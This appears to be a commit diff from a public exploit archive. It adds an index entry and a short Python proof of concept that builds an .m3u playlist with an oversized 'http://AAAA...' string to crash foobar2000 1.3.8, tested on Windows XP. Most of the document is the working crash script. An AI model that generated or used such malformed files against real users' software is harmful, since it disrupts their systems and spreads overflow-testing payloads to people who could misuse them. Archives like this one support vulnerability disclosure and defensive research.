DB: 2015-06-14

1 new exploits

files.csv

@@ -33635,6 +33635,7 @@ id,file,description,date,author,platform,type,port
 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
 37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
 37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
+37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
 37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
 37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
 37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,0

platforms/windows/dos/37267.py

@@ -0,0 +1,19 @@
+# Exploit Title: foobar2000 1.3.8 (.m3u) Local Crash PoC
+# Date: 12-06-2015
+# Exploit Author: 0neb1n
+# Vendor Homepage: http://www.foobar2000.org/
+# Software Link: http://www.foobar2000.org/getfile/e246984718ab7ab58fa1e0b072ff05a4/foobar2000_v1.3.8.exe
+# Version: 1.3.8
+# Tested on: Windows XP SP3 KOR
+
+file = "poc.m3u"
+
+data = 'http://' + '\x41' * 200000
+
+fd = open(file, 'w')
+fd.write(data)
+fd.close()
+print ""
+print "[*] File successfully created !!"
+print "[*] Author : 0neb1n"
+print "[*] Mail : barcodecrow(at)gmail(dot)com"